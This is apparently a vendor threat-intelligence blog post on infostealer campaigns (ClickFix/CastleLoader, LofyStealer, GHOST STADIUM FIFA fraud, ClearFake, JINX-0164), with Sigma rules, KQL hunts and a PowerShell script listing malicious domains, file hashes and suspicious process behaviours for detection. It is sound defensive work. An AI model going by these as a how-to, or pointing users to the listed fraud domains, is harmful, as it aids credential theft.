Back to Intelligence

ClickFix, LofyStealer & GHOST STADIUM: Emerging Infostealer Ecosystems and C2 Innovations — OTX Pulse Analysis

SA
Security Arsenal Team
May 30, 2026
6 min read

Threat Summary

Analysis of recent OTX pulses indicates a surge in diverse credential theft campaigns utilizing novel delivery mechanisms and resilient C2 infrastructure. adversaries are aggressively moving beyond standard phishing to employ "ClickFix" social engineering (mimicking CAPTCHA verification), Node.js loaders targeting gaming communities (LofyStealer), and blockchain-based smart contracts for command-and-control (ClearFake). Notably, the JINX-0164 actor is leveraging LinkedIn to target cryptocurrency developers with macOS-specific malware, while GHOST STADIUM demonstrates large-scale credential harvesting via FIFA World Cup 2026 ticket fraud. The collective objective is financial gain through direct theft (crypto, banking) or secondary monetization via selling initial access vectors and stolen session cookies.

Threat Actor / Malware Profile

ClickFix (CastleLoader & CastleStealer)

  • Distribution: Disguised as "BackgroundFix" image tools; uses fake "Verify you are human" browser prompts to copy malicious commands to the clipboard.
  • Payload Behavior: Executes commands via finger.exe to retrieve CastleLoader. Drops NetSupport RAT for remote access and CastleStealer (.NET) for credential exfiltration.
  • Persistence: Uses standard RAT persistence mechanisms (Registry run keys, scheduled tasks).

LofyStealer (LofyGang)

  • Distribution: Targets Minecraft players via social engineering.
  • Payload Behavior: Two-stage attack. Initial 53.5MB Node.js loader (disguised as libraries) drops a 1.4MB memory-only C++ payload. Harvests cookies, passwords, and crypto wallets from 8+ browsers.
  • Anti-Analysis: Uses syscalls evasion and executes payloads directly in memory to avoid disk scanning.

GHOST STADIUM

  • Distribution: Typosquatting and lookalike domains for FIFA 2026 (e.g., fifa.gold, fifa.black); propagated via Facebook ads.
  • Payload Behavior: Deploys Vidar and Lumma stealers. Clones FIFA authentication systems to harvest user credentials.
  • Infrastructure: Massive domain generation (4,300+ domains) ensuring redundancy against takedowns.

ClearFake (EtherHiding)

  • Distribution: Compromised websites injected with malicious JavaScript.
  • C2 Communication: Uses EtherHiding—storing payload routing instructions inside smart contracts on the BNB Smart Chain testnet. This creates an immutable, decentralized C2 that is nearly impossible to seize.
  • Payload: Delivers SectopRAT and ACRStealer.

JINX-0164

  • Distribution: LinkedIn phishing (recruiter persona);
  • Payload: Delivers AUDIOFIX (Python RAT/Stealer) and MINIRAT (Go Backdoor).
  • Targeting: Specific focus on cryptocurrency software developers and macOS environments.

IOC Analysis

The current dataset presents a high volume of Domain indicators (110+) associated with credential harvesting (Ghost Stadium) and C2 infrastructure (JINX-0164). File Hashes are predominantly SHA256 for loaders and stealers, with several MD5/SHA1 hashes for the LofyStealer components. URLs often utilize non-standard HTTP ports (e.g., :688), a specific TTP for ClickFix loaders designed to bypass standard egress filtering.

Operational Guidance:

  • SOCs: Prioritize blocking the listed FIFA-related domains and JINX-0164 infrastructure immediately.
  • EDR: Configure behavioral alerts for finger.exe spawning network connections or node.exe spawning child processes outside of development environments.
  • Network: Monitor DNS queries for the BNB Smart Chain testnet if ClearFake activity is suspected, alongside the specific suspicious domains.

Detection Engineering

Sigma Rules

YAML
title: ClickFix BackgroundFix Suspicious Finger.exe Execution
id: 9a8b7c6d-5e4f-3a2b-1c0d-9e8f7a6b5c4d
description: Detects execution of finger.exe initiated by a script or unusual parent process, consistent with ClickFix/CastleLoader infection chains using clipboard commands.
status: experimental
date: 2026/05/31
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/64271c9e2d35b133d84e8c4b/
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\finger.exe'
    filter_legitimate:
        ParentImage|contains:
            - '\System32\'
            - '\SysWOW64\'
    condition: selection and not filter_legitimate
falsepositives:
    - Legacy administration tools (rare)
level: high
---
title: LofyStealer Node.js Loader Spawning Shell
id: 1b2c3d4e-5f6a-7b8c-9d0e-1f2a3b4c5d6e
description: Detects Node.js processes spawning cmd.exe, powershell.exe, or bash, indicative of the LofyStealer Node.js loader decrypting and executing its C++ payload.
status: experimental
date: 2026/05/31
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/64271c9e2d35b133d84e8c4c/
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\node.exe'
        Image|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
    filter_dev:
        CommandLine|contains: 'npm'  # Ignore npm build scripts
    condition: selection and not filter_dev
falsepositives:
    - Legitimate development build processes
level: high
---
title: GHOST STADIUM FIFA Fraud Domain Access
id: 2c3d4e5f-6a7b-8c9d-0e1f-2a3b4c5d6e7f
description: Detects DNS queries or network connections to known FIFA World Cup 2026 fraudulent domains associated with the GHOST STADIUM campaign.
status: experimental
date: 2026/05/31
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/64271c9e2d35b133d84e8c4b/
tags:
    - attack.command_and_control
    - attack.t1071.001
logsource:
    category: dns_query
    product: windows
detection:
    keywords:
        DomainName|contains:
            - 'fifa.gold'
            - 'fifa.black'
            - 'fifa.tax'
            - 'fifaweb.com'
            - 'fifa.red'
            - 'fifa.fund'
            - 'fifa-com.shop'
    condition: keywords
falsepositives:
    - Low (These are not official FIFA domains)
level: critical

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for ClickFix C2 infrastructure and suspicious non-standard ports
DeviceNetworkEvents
| where ActionType in ("ConnectionSuccess", "ConnectionAttempt")
| where RemotePort == 688 or RemotePort in (80, 443) // ClickFix specific port noted in IOCs
| extend Domain = tostring(split(RemoteUrl, "/")[0])
| where Domain has_any ("trindastal.com", "poronto.com", "brionter.com", "giovettiadv.com")
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl, RemotePort, RemoteIP

// Hunt for LofyStealer File Hash presence
DeviceFileEvents
| where SHA256 in ("293006cec43c663ccff331795d662c3b73b4d7af5f8584e2899e286c672c9881", "45d4040e76a0d357dd6e236e185aba2eb82420d78640bfd1f3dede32b33931f7")
| project Timestamp, DeviceName, FileName, FolderPath, SHA256, InitiatingProcessAccountName

PowerShell Hunt Script

PowerShell
# IOC Hunter for JINX-0164 and Ghost Stadium Infrastructure
# Checks for presence of specific domains in hosts file or active connections

$TargetDomains = @(
    "driver-updater.net",
    "login.teamicrosoft.com",
    "live.ong",
    "teams.live.us.org",
    "fifa.gold",
    "fifa.black",
    "fifa.tax",
    "fifaweb.com",
    "fifa.red",
    "fifa.fund"
)

$MaliciousHashes = @(
    "bde21d8be65d31e1c380f2daae2f73c79f3e1f4bca70fb990db6fdf6c3768c92", # CastleLoader
    "b6cab0b3aa8e56e2427f486c74588d598ae58bb0cbc0eda6939fe171cb0aed17"  # AUDIOFIX
)

Write-Host "[+] Checking for active network connections to known C2 domains..." -ForegroundColor Cyan
$Connections = Get-NetTCPConnection | Where-Object { $_.State -eq 'ESTABLISHED' } | Select-Object -ExpandProperty RemoteAddress

foreach ($IP in $Connections) {
    try {
        $HostEntry = [System.Net.Dns]::GetHostEntry($IP)
        if ($TargetDomains -contains $HostEntry.HostName) {
            Write-Host "[!] ALERT: Connection found to malicious domain: $($HostEntry.HostName) ($IP)" -ForegroundColor Red
        }
    } catch {
        # No reverse DNS, skip
    }
}

Write-Host "[+] Scanning for malicious file hashes (CastleLoader/AUDIOFIX)..." -ForegroundColor Cyan
$Drives = Get-PSDrive -PSProvider FileSystem
foreach ($Drive in $Drives) {
    Get-ChildItem -Path $Drive.Root -Recurse -ErrorAction SilentlyContinue | Where-Object { 
        $_.Length -gt 0 -and !$_.PSIsContainer 
    } | ForEach-Object {
        $Hash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
        if ($MaliciousHashes -contains $Hash) {
            Write-Host "[!] ALERT: Malicious file found: $($_.FullName)" -ForegroundColor Red
        }
    }
}
Write-Host "[+] Hunt complete."

Response Priorities

  • Immediate: Block all domains listed in the IOC Analysis (specifically FIFA-lookalikes and JINX-0164 typosquats) at the perimeter. Hunt for finger.exe execution across the enterprise.
  • 24h: If potential compromise is detected (e.g., presence of LofyStealer or Ghost Stadium activity), force password resets for affected users and invalidate session tokens. Investigate any macOS developer laptops for connections to live.ong or driver-updater.net.
  • 1 week: Implement application control policies to restrict finger.exe and unsigned Node.js modules. Conduct security awareness training regarding "ClickFix" browser verification prompts and LinkedIn recruiting scams targeting developers.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-credentialsinfostealerclickfixlofystealercredential-theftphishing

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action